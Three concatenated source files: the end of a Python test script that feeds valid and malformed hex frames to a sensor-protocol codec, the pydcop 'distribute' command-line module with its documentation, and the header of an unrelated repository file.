"A7 00 01 02 04 13 22" + # 7
"010100010120 010100010121 1001" + # 14
"800010 800011 800012 800013" + # 12
"",ERR_SYM_EXP=True)
# --- TIC batch-report checks, including deliberately truncated/oversized frames ---
# TIC CBE, Batch HCHC(7,U32),HCHP (8,u32)
WTCParseBuildTest(STDFrame, "11 06 0054 39 0000 07 0000 800a 00000064 00000001 01 08 0001 800b 00000065 00000002 09")
WTCParseBuildTest(STDFrame, "11 06 0054 39 0000 07 0000 800a 00000064 00000001 01 08 0001 800b 00000065 00000002 09 00",ERR_PARSE_EXP=True)
WTCParseBuildTest(STDFrame, "11 06 0054 39 0000 03 0000 800a 00000064 00000001 01 08 0001 800b 00000065 00000002 09",ERR_PARSE_EXP=True)
WTCParseBuildTest(STDFrame, "11 06 0054 39 0000 07 0000 800a 00000064 00000001 01 08 0001 800b 00000065 00000002 ",ERR_PARSE_EXP=True)
WTCParseBuildTest(STDFrame, "11 06 0054 39 0000 02 0000 800a 00000064 00000001 01 08 0001 800b 00000065 00000002 09",ERR_PARSE_EXP=True)
# TIC STD, Batch EAST(5,U32),EAIT(20,U32),SINSTS(33,U24),SINSTS(33,U24)
WTCParseBuildTest(STDFrame, "11 06 0056 69 0000 05 0000 800a 00000064 00000001 02 14 0001 800b 00000065 00000002 0A 21 0002 800c 000066 000001 12 21 0002 800c 000067 000001 1A")
# Error: one excess trailing byte (00)
WTCParseBuildTest(STDFrame, "11 06 0056 69 0000 05 0000 800a 00000064 00000001 02 14 0001 800b 00000065 00000002 0A 21 0002 800c 000066 000001 12 21 0002 800c 000067 000001 1A 00",ERR_PARSE_EXP=True)
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# BEWARE FOLLOWING LINE MAKES ALL VALIDATION SCRIPT BROKEN ???????!!!!!!!!!!!!!
# Error: two excess trailing bytes (0000)
#WTCParseBuildTest(STDFrame, "11 06 0056 69 0000 05 0000 800a 00000064 00000001 02 14 0001 800b 00000065 00000002 0A 21 0002 800c 000066 000001 12 21 0002 800c 000067 000001 1A 0000",ERR_PARSE_EXP=True)
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# Error: three excess trailing bytes (000000)
WTCParseBuildTest(STDFrame, "11 06 0056 69 0000 05 0000 800a 00000064 00000001 02 14 0001 800b 00000065 00000002 0A 21 0002 800c 000066 000001 12 21 0002 800c 000067 000001 1A 000000",ERR_PARSE_EXP=True)
# TIC PMEPMI, Batch PA1_s (23,U16), PA1_i (24,U16)
WTCParseBuildTest(STDFrame, "11 06 0057 29 0000 17 0000 800a 0032 0001 02 18 0001 800b 0033 0001 0A ")
# TIC ICE, Batch EA(3,U24),ERP(4,U24),PA1MN(39,U16),PA10MN(40,U16),PREA1MN(41,I16),PREA10MN(42,I16)
WTCParseBuildTest(STDFrame, "11 06 0053 81 0000 " +
"04 0000 803C 000001 000001 03 " +
"04 0000 803C 000001 000001 0B " +
"27 0000 803C 0001 0001 13 " +
"28 0000 803C 0001 0001 1B " +
"29 0000 803C FFFF FFFE 23 " +
"2A 0000 803C FFFD FFFC 2B " +
"")
WTCParseBuildTest(STDFrame,"110A005700004122680102030C28293706042036018312021709150A3B300D28D6B320005A320000300A",PRINT_JSON_IF_OK=True)
WTCParseBuildTest(STDFrame,"110A005700004122680102030C28293706042036018312021709150A3B300D28D6B320005A320000300A;rev=5339",PRINT_JSON_IF_OK=True)
# Not-yet-decoded frame
WTCParseBuildTest(STDFrame, "3106005231000000800F800F7FFFFF0000010B01800F800F7FFFFF00000113")
# BAD FRAME EXAMPLES — malformed/edge-case frames fed straight to the codec
WTCParseBuildTest(STDFrame, "110000520000FF",ERR_SYM_EXP=True)
WTCParseBuildTest(STDFrame, "11010052000000420C000000000002000300040005")
WTCParseBuildTest(STDFrame, "5105800a0001230000000A")
WTCParseBuildTest(STDFrame, "3106800A000000410001000A200000000000000000000000000000000000000000000000000000000000000000")
WTCParseBuildTest(STDFrame, "1106800B000000410000800106000000000000")
WTCParseBuildTest(STDFrame, "1106800b800000410001800107700007d0006401")
WTCParseBuildTest(STDFrame, "1106800a80000041000180010b7005000003e80000006401")
WTCParseBuildTest(STDFrame, "11060050800006410005000a044804000a")
WTCParseBuildTest(STDFrame, "118a000f0402230000000aa0d00000000a0000000001")
WTCParseBuildTest(STDFrame, "110a005000064107010536d80e4e01a059022ee0000001")
WTCParseBuildTest(STDFrame, "110a005000064107010536d80e4e01")
WTCParseBuildTest(STDFrame, "110a04020000290102")
WTCParseBuildTest(STDFrame, "1108000f000055")
WTCParseBuildTest(STDFrame, "1106000f000402238001800a01020304")
WTCParseBuildTest(STDFrame, "1106000fA004022300008001D00000000a0000000001")
WTCParseBuildTest(STDFrame, "11060050A0000641000580011838022ee00000010600000001000259022ee0000001020003")
WTCParseBuildTest(STDFrame, "11060050A0000641000580011830022ee000000151022ee0000001",ERR_PARSE_EXP=True)
WTCParseBuildTest(STDFrame, "1106005000000641000aa76005000400c800")
WTCParseBuildTest(STDFrame, "1107000f00000055")
WTCParseBuildTest(STDFrame, "1100000f0055")
WTCParseBuildTest(STDFrame, "1101000f0055001001")
WTCParseBuildTest(STDFrame, "110100500006004107010536d80e4e01")
WTCParseBuildTest(STDFrame, "1150000602")
WTCParseBuildTest(STDFrame, "110a000c00553911111111")
WTCParseBuildTest(STDFrame, "1106000c000055390001001011111111")
WTCParseBuildTest(STDFrame, "1107000c80000055")
WTCParseBuildTest(STDFrame, "1108000c000055")
WTCParseBuildTest(STDFrame, "1109000c00000055390001001011111111")
WTCParseBuildTest(STDFrame, "1100000c0055")
WTCParseBuildTest(STDFrame, "1101000c0055003911111111")
WTCParseBuildTest(STDFrame, "1100000c0100")
WTCParseBuildTest(STDFrame, "1101000c0100002311111111")
WTCParseBuildTest(STDFrame, "110000000002")
WTCParseBuildTest(STDFrame, "110000000003")
WTCParseBuildTest(STDFrame, "110000000004")
WTCParseBuildTest(STDFrame, "110000000005")
# Basic attribute read/report frames across clusters 0x0000, 0x000F, 0x0050, 0x8008
WTCParseBuildTest(STDFrame, "110000000006")
WTCParseBuildTest(STDFrame, "110000000010")
WTCParseBuildTest(STDFrame, "110100000010004200")
WTCParseBuildTest(STDFrame, "11010000001080")
WTCParseBuildTest(STDFrame, "11010000800100420000",ERR_SYM_EXP=True)
WTCParseBuildTest(STDFrame, "110a000f00551001")
WTCParseBuildTest(STDFrame, "1106000f000055100001001000")
WTCParseBuildTest(STDFrame, "1107000f81000055")
WTCParseBuildTest(STDFrame, "1108000f000055")
WTCParseBuildTest(STDFrame, "1109000f81000055")
WTCParseBuildTest(STDFrame, "1100000f0055")
WTCParseBuildTest(STDFrame, "1101000f0055001001")
WTCParseBuildTest(STDFrame, "110a000f04022311111111")
WTCParseBuildTest(STDFrame, "1106000f000402230001001011111111")
WTCParseBuildTest(STDFrame, "1107000f80000402")
WTCParseBuildTest(STDFrame, "1108000f000402")
WTCParseBuildTest(STDFrame, "1109000f80000402230001001011111111",ERR_SYM_EXP=True)
WTCParseBuildTest(STDFrame, "1100000f0402")
WTCParseBuildTest(STDFrame, "1101000f0402002311111111")
WTCParseBuildTest(STDFrame, "1100000f0054")
WTCParseBuildTest(STDFrame, "1101000f0054001000")
WTCParseBuildTest(STDFrame, "1105000f00541000")
WTCParseBuildTest(STDFrame, "1100000f0400")
WTCParseBuildTest(STDFrame, "1100000f0401")
WTCParseBuildTest(STDFrame, "1101000f040100210000")
WTCParseBuildTest(STDFrame, "1105000f0401210000")
WTCParseBuildTest(STDFrame, "1100000f0100")
WTCParseBuildTest(STDFrame, "1101000f0100002303010002")
WTCParseBuildTest(STDFrame, "110000500004")
WTCParseBuildTest(STDFrame, "110a0050000641050100000100",ERR_SYM_EXP=True)
WTCParseBuildTest(STDFrame, "110a005000064103010000")
WTCParseBuildTest(STDFrame, "110a00500006410501040DAC04")
WTCParseBuildTest(STDFrame, "118a00500006410501040DAC0400")
WTCParseBuildTest(STDFrame, "1106005000000641000100100501010DAC01")
WTCParseBuildTest(STDFrame, "1107005081000006")
WTCParseBuildTest(STDFrame, "11080050000006")
WTCParseBuildTest(STDFrame, "1109005081000006")
WTCParseBuildTest(STDFrame, "110000500006")
WTCParseBuildTest(STDFrame, "1101005000060041050101000001")
WTCParseBuildTest(STDFrame, "110a80080000290001")
WTCParseBuildTest(STDFrame, "1106800800000029000101001111")
WTCParseBuildTest(STDFrame, "1107800880000000")
WTCParseBuildTest(STDFrame, "11088008000000")
WTCParseBuildTest(STDFrame, "110980080000000029001001001111")
WTCParseBuildTest(STDFrame, "110080080000")
WTCParseBuildTest(STDFrame, "11018008000000291111")
WTCParseBuildTest(STDFrame, "110080080002")
WTCParseBuildTest(STDFrame, "11018008000200291111")
WTCParseBuildTest(STDFrame, "110080080003")
WTCParseBuildTest(STDFrame, "110180080003002312121212")
WTCParseBuildTest(STDFrame, "1105800800032312121212")
WTCParseBuildTest(STDFrame, "110080080004")
WTCParseBuildTest(STDFrame, "11018008000400211111")
WTCParseBuildTest(STDFrame, "110580080004211111")
WTCParseBuildTest(STDFrame, "110080080005")
WTCParseBuildTest(STDFrame, "11018008000500211111")
WTCParseBuildTest(STDFrame, "110580080005211111")
WTCParseBuildTest(STDFrame, "110080080006")
WTCParseBuildTest(STDFrame, "110180080006002311111111")
WTCParseBuildTest(STDFrame, "1105800800062311111111")
# Cluster 0x8008 (attribute ids 0x0100-0x0102) and cluster 0x8004 / 0x8005 / 0x0013 / 0x0405 frames
WTCParseBuildTest(STDFrame, "110a80080100291111")
WTCParseBuildTest(STDFrame, "1106800800010029000100101111")
WTCParseBuildTest(STDFrame, "1107800881000100")
WTCParseBuildTest(STDFrame, "11088008000100")
WTCParseBuildTest(STDFrame, "110980080000010029000100101111")
WTCParseBuildTest(STDFrame, "110080080100")
WTCParseBuildTest(STDFrame, "11018008010000291111")
WTCParseBuildTest(STDFrame, "110a80080101291111")
WTCParseBuildTest(STDFrame, "1106800800010129000101101111")
WTCParseBuildTest(STDFrame, "1107800880000101")
WTCParseBuildTest(STDFrame, "11088008000101")
WTCParseBuildTest(STDFrame, "1109800880000101")
WTCParseBuildTest(STDFrame, "110080080101")
WTCParseBuildTest(STDFrame, "11018008010100291111")
WTCParseBuildTest(STDFrame, "110a80080102291111")
WTCParseBuildTest(STDFrame, "1106800800010229000110001111")
WTCParseBuildTest(STDFrame, "1107800880000102")
WTCParseBuildTest(STDFrame, "11088008000102")
WTCParseBuildTest(STDFrame, "1109800882000102")
WTCParseBuildTest(STDFrame, "110080080102")
WTCParseBuildTest(STDFrame, "11018008010200291111")
WTCParseBuildTest(STDFrame, "110080040000")
WTCParseBuildTest(STDFrame, "110180040000000811")
WTCParseBuildTest(STDFrame, "1105800400000801")
WTCParseBuildTest(STDFrame, "110080040001")
WTCParseBuildTest(STDFrame, "110180040001002012")
WTCParseBuildTest(STDFrame, "1105800400012011")
WTCParseBuildTest(STDFrame, "110080040002")
WTCParseBuildTest(STDFrame, "11018004000200410400011111")
WTCParseBuildTest(STDFrame, "110580040002410411110000")
WTCParseBuildTest(STDFrame, "1101800400030041020011")
WTCParseBuildTest(STDFrame, "11058004000341020011")
WTCParseBuildTest(STDFrame, "110080040004")
WTCParseBuildTest(STDFrame, "11018004000400410411111111")
WTCParseBuildTest(STDFrame, "110580040004410411111111")
WTCParseBuildTest(STDFrame, "110080040005")
WTCParseBuildTest(STDFrame, "1101800400050041081212121212121212")
WTCParseBuildTest(STDFrame, "1105800400054108",ERR_PARSE_EXP=True)
WTCParseBuildTest(STDFrame, "1107800580000000")
WTCParseBuildTest(STDFrame, "11088005000000")
WTCParseBuildTest(STDFrame, "110080050000")
WTCParseBuildTest(STDFrame, "110a001300552011")
WTCParseBuildTest(STDFrame, "11060013000055200001100011")
WTCParseBuildTest(STDFrame, "1107001380000055")
WTCParseBuildTest(STDFrame, "110a04050000211111")
WTCParseBuildTest(STDFrame, "1106040500000021000110001111")
WTCParseBuildTest(STDFrame, "1107040581000000")
WTCParseBuildTest(STDFrame, "11080405000000")
WTCParseBuildTest(STDFrame, "110904050000000021000110001111")
WTCParseBuildTest(STDFrame, "11080013000055")
WTCParseBuildTest(STDFrame, "1109001300000055200001100001")
WTCParseBuildTest(STDFrame, "110000130055")
WTCParseBuildTest(STDFrame, "110100130055002011")
WTCParseBuildTest(STDFrame, "1105001300552011")
WTCParseBuildTest(STDFrame, "11000013004a")
WTCParseBuildTest(STDFrame, "11010013004a002011")
WTCParseBuildTest(STDFrame, "11050013004a2011")
WTCParseBuildTest(STDFrame, "110000130100")
WTCParseBuildTest(STDFrame, "11010013010000230effffff")
WTCParseBuildTest(STDFrame, "110a000600001000")
# Clusters 0x0006, 0x0405, 0x8003, 0x8006, 0x8007, 0x0052, 0x0402 frame checks
WTCParseBuildTest(STDFrame, "11060006000000100001110001")
WTCParseBuildTest(STDFrame, "1107000682000000")
WTCParseBuildTest(STDFrame, "11080006000000")
WTCParseBuildTest(STDFrame, "1109000680000000")
WTCParseBuildTest(STDFrame, "110000060000")
WTCParseBuildTest(STDFrame, "110100060000001000")
WTCParseBuildTest(STDFrame, "110004050000")
WTCParseBuildTest(STDFrame, "11010405000000211111")
WTCParseBuildTest(STDFrame, "110004050001")
WTCParseBuildTest(STDFrame, "110004050002")
WTCParseBuildTest(STDFrame, "11010405000200211111")
WTCParseBuildTest(STDFrame, "110a800300001801")
WTCParseBuildTest(STDFrame, "11068003000000180001800A11")
WTCParseBuildTest(STDFrame, "1107800382000000")
WTCParseBuildTest(STDFrame, "11088003000000")
WTCParseBuildTest(STDFrame, "1109800381000000")
WTCParseBuildTest(STDFrame, "110080030000")
WTCParseBuildTest(STDFrame, "110180030000001810")
WTCParseBuildTest(STDFrame, "110080030001")
WTCParseBuildTest(STDFrame, "110180030001004106001001001000")
WTCParseBuildTest(STDFrame, "1105800300014106001001001000")
WTCParseBuildTest(STDFrame, "110080030002")
WTCParseBuildTest(STDFrame, "110080030003")
WTCParseBuildTest(STDFrame, "11018003000300211111")
WTCParseBuildTest(STDFrame, "110080030004")
WTCParseBuildTest(STDFrame, "110180030004002854")
WTCParseBuildTest(STDFrame, "110080030005")
WTCParseBuildTest(STDFrame, "110180030005002801")
WTCParseBuildTest(STDFrame, "110080030006")
WTCParseBuildTest(STDFrame, "1101800300060041050101000100")
WTCParseBuildTest(STDFrame, "110080060000")
WTCParseBuildTest(STDFrame, "1101800600000022002580")
WTCParseBuildTest(STDFrame, "1105800600002201C200")
WTCParseBuildTest(STDFrame, "110080060001")
WTCParseBuildTest(STDFrame, "110180060001002010")
WTCParseBuildTest(STDFrame, "1105800600012011")
WTCParseBuildTest(STDFrame, "110080060002")
WTCParseBuildTest(STDFrame, "110180060002002011")
WTCParseBuildTest(STDFrame, "11058006000220",ERR_PARSE_EXP=True)
WTCParseBuildTest(STDFrame, "110080060003")
WTCParseBuildTest(STDFrame, "1105800600032000")
WTCParseBuildTest(STDFrame, "110080070000")
WTCParseBuildTest(STDFrame, "1106800700000141000110000111")
WTCParseBuildTest(STDFrame, "1107800780000001")
WTCParseBuildTest(STDFrame, "11088007000001")
WTCParseBuildTest(STDFrame, "1109800700000001410001000A0101")
WTCParseBuildTest(STDFrame, "110080070001")
WTCParseBuildTest(STDFrame, "110080070002")
WTCParseBuildTest(STDFrame, "110180070002002011")
WTCParseBuildTest(STDFrame, "110a00520000410c111111000000111100002112")
WTCParseBuildTest(STDFrame, "1106005200000041011010000c000100111111212100001111")
WTCParseBuildTest(STDFrame, "1107005280000000")
WTCParseBuildTest(STDFrame, "11080052000000")
WTCParseBuildTest(STDFrame, "1109005200000000410001000A0c000001000002000300040005")
WTCParseBuildTest(STDFrame, "110000520000")
WTCParseBuildTest(STDFrame, "11010052000000410c101010010101111100001111")
WTCParseBuildTest(STDFrame, "110a04020000291010")
WTCParseBuildTest(STDFrame, "1106040200000029000110001010")
WTCParseBuildTest(STDFrame, "1107040280000000")
WTCParseBuildTest(STDFrame, "11080402000000")
# Clusters 0x0402, 0x8002, 0x0000 and batch-report (0x803c) frames, then conclude
WTCParseBuildTest(STDFrame, "110004020000")
WTCParseBuildTest(STDFrame, "110904020000000029000110001111")
WTCParseBuildTest(STDFrame, "11010402000000290010")
WTCParseBuildTest(STDFrame, "110004020001")
WTCParseBuildTest(STDFrame, "11010402000100290010")
WTCParseBuildTest(STDFrame, "110004020002")
WTCParseBuildTest(STDFrame, "11010402000200291100")
WTCParseBuildTest(STDFrame, "110a800200002b10101010")
WTCParseBuildTest(STDFrame, "110680020000002b0001100011111111")
WTCParseBuildTest(STDFrame, "1107800280000000")
WTCParseBuildTest(STDFrame, "11088002000000")
WTCParseBuildTest(STDFrame, "11098002000000002b0001100011111111")
WTCParseBuildTest(STDFrame, "110080020000")
WTCParseBuildTest(STDFrame, "110180020000002b11111111")
WTCParseBuildTest(STDFrame, "1105800200002b11111111")
WTCParseBuildTest(STDFrame, "110080020001")
WTCParseBuildTest(STDFrame, "110180020001002011")
WTCParseBuildTest(STDFrame, "110a800200022811")
WTCParseBuildTest(STDFrame, "11068002000002280001100011")
WTCParseBuildTest(STDFrame, "1107800280000002")
WTCParseBuildTest(STDFrame, "11088002000002")
WTCParseBuildTest(STDFrame, "1109800200000002280001100011")
WTCParseBuildTest(STDFrame, "110080020002")
WTCParseBuildTest(STDFrame, "110180020002002811")
WTCParseBuildTest(STDFrame, "110a800200032801")
WTCParseBuildTest(STDFrame, "11068002000003280001100011")
WTCParseBuildTest(STDFrame, "1107800280000003")
WTCParseBuildTest(STDFrame, "1109800200000003280001100011")
WTCParseBuildTest(STDFrame, "110080020003")
WTCParseBuildTest(STDFrame, "110180020003002811")
WTCParseBuildTest(STDFrame, "110080080004")
WTCParseBuildTest(STDFrame, "110180020004002001")
WTCParseBuildTest(STDFrame, "110000000010")
WTCParseBuildTest(STDFrame, "1101000000030042023031")
WTCParseBuildTest(STDFrame, "110100000004004200")
WTCParseBuildTest(STDFrame, "1101000000050042023031")
WTCParseBuildTest(STDFrame, "110100500004004c00001100110000110000")
WTCParseBuildTest(STDFrame, "11060050150006020000803c0000006413")
WTCParseBuildTest(STDFrame, "1106000c1d0055000000803c3b449ba63c23d70a81")
WTCParseBuildTest(STDFrame, "3106000c1d0055000000803c000000000000000001")
WTCParseBuildTest(STDFrame, "1106000f110055000000803c010111")
WTCParseBuildTest(STDFrame, "1106000f110055000000803c000001")
WTCParseBuildTest(STDFrame, "1106000f1d0402000000803c000000000000000001")
WTCParseBuildTest(STDFrame, "11060400150000000000803c0000000a2b")
WTCParseBuildTest(STDFrame, "11060402900000290000803c480000")
WTCParseBuildTest(STDFrame, "11060402150000000000803c000003e802")
WTCParseBuildTest(STDFrame, "11060405800000210000803c100000000001")
WTCParseBuildTest(STDFrame, "11060405150000000000803c000000640a")
WTCParseBuildTest(STDFrame, "1106000f110055000000803c00011a")
WTCParseBuildTest(STDFrame, "11068008150000000000803c0000000001")
WTCParseBuildTest(STDFrame, "110080080006")
WTCParseBuildTest(STDFrame, "11068008150100000000803c000A000B01")
WTCParseBuildTest(STDFrame, "11068008150101000000803c000C000D01")
WTCParseBuildTest(STDFrame, "11068008150102000000803c000D000E01")
WTCParseBuildTest(STDFrame, "1100000f0054")
WTCParseBuildTest(STDFrame, "11060403150000000000803c0000000001")
WTCParseBuildTest(STDFrame, "11060400150000000000803c0000000001")
# Print the pass/fail summary for the whole run.
WTCParseConclude()
'''
# COMPILING NOT DIRECTLY WORKING ON OUR CODEC
# st=STDFrame.compile(filename="copyforinspection.py")
# print(st.parse(b"\x11\x00\x00\x50\x00\x04"))
print(STDFrame.benchmark(b"\x11\x00\x00\x50\x00\x04"))
''' |
# BSD-3-Clause License
#
# Copyright 2017 Orange
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
.. _pydcop_commands_distribute:
pydcop distribute
=================
``pydcop distribute`` distributes the computations for a DCOP over a set
of agents.
Synopsis
--------
::
pydcop distribute --distribution <distribution_method>
[--cost <distribution_method_for cost>]
[--graph <graph_model>]
[--algo <dcop_algorithm>] <dcop-files>
Description
-----------
Distributes the computations used to solve a DCOP.
The distribution obtained is written in yaml on standard output. It can also be
written into a file by using the ``--output`` global option. The
output file can be used as an input for
several commands that accept a distribution (e.g.
:ref:`orchestrator<pydcop_commands_orchestrator>`,
:ref:`solve<pydcop_commands_solve>`,
:ref:`run<pydcop_commands_run>`)
See Also
--------
:ref:`concepts_graph` and
:ref:`concepts_distribution`
Options
-------
``--distribution <distribution_method>`` / ``-d <distribution_method>``
The distribution algorithm (``oneagent``, ``adhoc``, ``ilp_fgdp``, etc.,
see :ref:`concepts_distribution`).
``--cost <distribution_method_for_cost>``
A distribution method that can be used to evaluate the cost of a
distribution. If not given, defaults to ``<distribution_method>``. If the
distribution method does not define cost, a cost None will be returned in
the command output.
``--algo <dcop_algorithm>`` / ``-a <dcop_algorithm>``
The (optional) algorithm whose computations will be distributed. It is needed
when the distribution depends on the computation's characteristics (which
depend on the algorithm). For example when the distribution is based on
computations' footprint or communication load, the dcop algorithm is needed.
``--graph <graph_model>`` / ``-g <graph_model>``
The (optional) computation graph model,
one of ``factor_graph``, ``pseudotree``, ``constraints_hypergraph``
(see. :ref:`concepts_graph`)
The set of computation to distribute depends on the graph model used to
represent the DCOP.
When the ``--algo`` option is used, it is not required as the graph model
can be deduced from the DCOP algorithm.
``<dcop-files>``
One or several paths to the files containing the dcop. If several paths are
given, their content is concatenated and used as the yaml definition for the
DCOP.
Examples
--------
Distributing a DCOP for dsa, hence modeled as a constraints graph,
using the ``ilp_compref`` distribution method::
pydcop distribute -d ilp_compref -a dsa \\
graph_coloring_10_4_15_0.1_capa_costs.yml
Distributing a DCOP modelled as a factor graph. The DCOP algorithm is not
required here as the ``oneagent`` distribution algorithm does not depend on
the computation's characteristics (as it simply assign one computation to each
agent)::
pydcop distribute --graph factor_graph \\
--dist oneagent graph_coloring1.yaml
The following command gives the same result. Here, we can deduce the required
graph model, as maxsum works on a factor graph::
pydcop distribute --algo maxsum \\
--dist oneagent graph_coloring1.yaml
Example output::
cost: 0
distribution:
a1: [v3]
a2: [diff_1_2]
a3: [diff_2_3]
a4: [v1]
a5: [v2]
inputs:
algo: null
dcop: [tests/instances/graph_coloring1.yaml]
dist_algo: oneagent
graph: factor_graph
"""
import logging
import os
import threading
import traceback
from importlib import import_module
import sys
import time
import yaml
from pydcop.algorithms import list_available_algorithms, load_algorithm_module
from pydcop.commands._utils import _error
from pydcop.dcop.yamldcop import load_dcop_from_file
from pydcop.distribution.objects import ImpossibleDistributionException
logger = logging.getLogger("pydcop.cli.distribute")
def set_parser(subparsers):
    """Register the ``distribute`` sub-command and its options on *subparsers*."""
    algos = list_available_algorithms()
    parser = subparsers.add_parser("distribute", help="distribute a static dcop")
    # Entry point and timeout handler invoked by the CLI driver.
    parser.set_defaults(func=run_cmd, on_timeout=on_timeout)

    # One or more yaml dcop files (concatenated when several are given).
    parser.add_argument(
        "dcop_files", type=str, nargs="+", metavar="FILE", help="dcop file(s)"
    )

    parser.add_argument(
        "-g",
        "--graph",
        required=False,
        choices=["factor_graph", "pseudotree", "constraints_hypergraph"],
        help="Graphical model for dcop computations.",
    )

    distribution_methods = [
        "oneagent",
        "adhoc",
        "ilp_fgdp",
        "ilp_compref",
        "heur_comhost",
        "gh_secp_cgdp",
        "gh_secp_fgdp",
        "oilp_secp_fgdp",
        "oilp_secp_cgdp",
        "oilp_cgdp",
        "gh_cgdp",
    ]
    parser.add_argument(
        "-d",
        "--distribution",
        choices=distribution_methods,
        required=True,
        help="Algorithm for distributing the computation graph.",
    )

    parser.add_argument(
        "--cost",
        choices=["ilp_compref", "oilp_secp_fgdp", "oilp_secp_cgdp", "oilp_cgdp"],
        default=None,
        help="algorithm for computing the cost of the distribution.",
    )

    # Only needed when the distribution method uses per-computation metrics.
    parser.add_argument(
        "-a",
        "--algo",
        choices=algos,
        required=False,
        help="Optional, only needed for distribution methods that require "
        "the memory footprint and communication load for computations",
    )
def run_cmd(args, timer=None, timeout=None):
    """Run the ``distribute`` command.

    Loads the DCOP, builds the computation graph, distributes it over the
    agents and prints the resulting distribution (and its cost, when a cost
    function is available) as YAML.

    :param args: parsed command-line arguments (see :func:`set_parser`).
    :param timer: optional timeout timer, cancelled once the distribution
        has been computed.
    :param timeout: unused here; kept for consistency with the CLI command
        interface.
    """
    logger.debug('dcop command "distribute" with arguments {} '.format(args))
    dcop_yaml_files = args.dcop_files
    logger.info("loading dcop from {}".format(dcop_yaml_files))
    dcop = load_dcop_from_file(dcop_yaml_files)
    dist_module = load_distribution_module(args.distribution)
    # The cost can come from a dedicated module (--cost) or from the
    # distribution module itself, when it knows how to evaluate a distribution.
    if args.cost:
        cost_module = load_distribution_module(args.cost)
    elif hasattr(dist_module, "distribution_cost"):
        cost_module = dist_module
    else:
        cost_module = None
    algo_module, graph_module = None, None
    if args.algo is not None:
        algo_module = load_algo_module(args.algo)
    if args.graph is not None:
        graph_type = args.graph
        graph_module = load_graph_module(args.graph)
        # Check that the graph model and the algorithm are compatible:
        if algo_module is not None and algo_module.GRAPH_TYPE != args.graph:
            _error("Incompatible graph model and algorithm")
    elif algo_module is not None:
        # No explicit graph model: deduce it from the algorithm.
        graph_module = load_graph_module(algo_module.GRAPH_TYPE)
        graph_type = algo_module.GRAPH_TYPE
    else:
        # Fix: error message typo "at leat" -> "at least".
        _error("You must pass at least --graph or --algo option")
    # Build the computation graph for the selected graph model.
    logger.info("Building computation graph for dcop {}".format(dcop_yaml_files))
    cg = graph_module.build_computation_graph(dcop)
    logger.info("Distributing computation graph for dcop {}".format(dcop_yaml_files))
    # Footprint / communication-load functions are only available when an
    # algorithm was given; some distribution methods require them.
    if algo_module is None:
        computation_memory = None
        communication_load = None
    else:
        computation_memory = algo_module.computation_memory
        communication_load = algo_module.communication_load
    try:
        start_t = time.time()
        distribution = dist_module.distribute(
            cg,
            dcop.agents.values(),
            hints=dcop.dist_hints,
            computation_memory=computation_memory,
            communication_load=communication_load,
        )
        duration = time.time() - start_t
        dist = distribution.mapping()
        if timer:
            timer.cancel()
        if cost_module:
            cost, comm, hosting = cost_module.distribution_cost(
                distribution,
                cg,
                dcop.agents.values(),
                computation_memory=computation_memory,
                communication_load=communication_load,
            )
        else:
            cost, comm, hosting = None, None, None
        result = {
            "inputs": {
                "dist_algo": args.distribution,
                "dcop": args.dcop_files,
                "graph": graph_type,
                "algo": args.algo,
                "duration": duration,
            },
            "distribution": dist,
            "cost": cost,
            "communication_cost": comm,
            "hosting_cost": hosting,
        }
        # NOTE(review): args.output is not declared by set_parser — presumably
        # added by the top-level CLI parser; confirm before relying on it.
        if args.output is not None:
            with open(args.output, encoding="utf-8", mode="w") as fo:
                fo.write(yaml.dump(result))
        print(yaml.dump(result))
        sys.exit(0)
    except ImpossibleDistributionException as e:
        if timer:
            timer.cancel()
        result = {"status": "FAIL", "error": str(e)}
        print(yaml.dump(result))
        sys.exit(2)
def on_timeout():
    """Timeout handler: dump the stack of every live thread, then hard-exit."""
    print("TIMEOUT when distributing")
    logger.info("cli timeout when distributing")
    for thread in threading.enumerate():
        print(thread)
        traceback.print_stack(sys._current_frames()[thread.ident])
    # Hard exit: worker threads may be stuck, so a normal sys.exit(2) could hang.
    os._exit(2)
def load_distribution_module(dist):
    """Import and return the distribution module named *dist*.

    Reports a CLI error when no such module exists.
    """
    try:
        return import_module("pydcop.distribution.{}".format(dist))
    except ImportError as e:
        _error("Could not find distribution method {}".format(dist), e)
        return None
def load_graph_module(graph):
    """Import and return the computation-graph module named *graph*.

    Reports a CLI error when no such graph model exists.
    """
    try:
        return import_module("pydcop.computations_graph.{}".format(graph))
    except ImportError as e:
        _error("Could not find computation graph type: {}".format(graph), e)
        return None
def load_algo_module(algo):
    """Load and return the DCOP algorithm module named *algo*.

    Reports a CLI error when the algorithm is unknown.
    """
    try:
        return load_algorithm_module(algo)
    except ImportError as e:
        _error("Could not find dcop algorithm: {}".format(algo), e)
        return None
|
<reponame>MagiCzOOz/signallike-embedding<gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Aug 31 13:33:35 2020
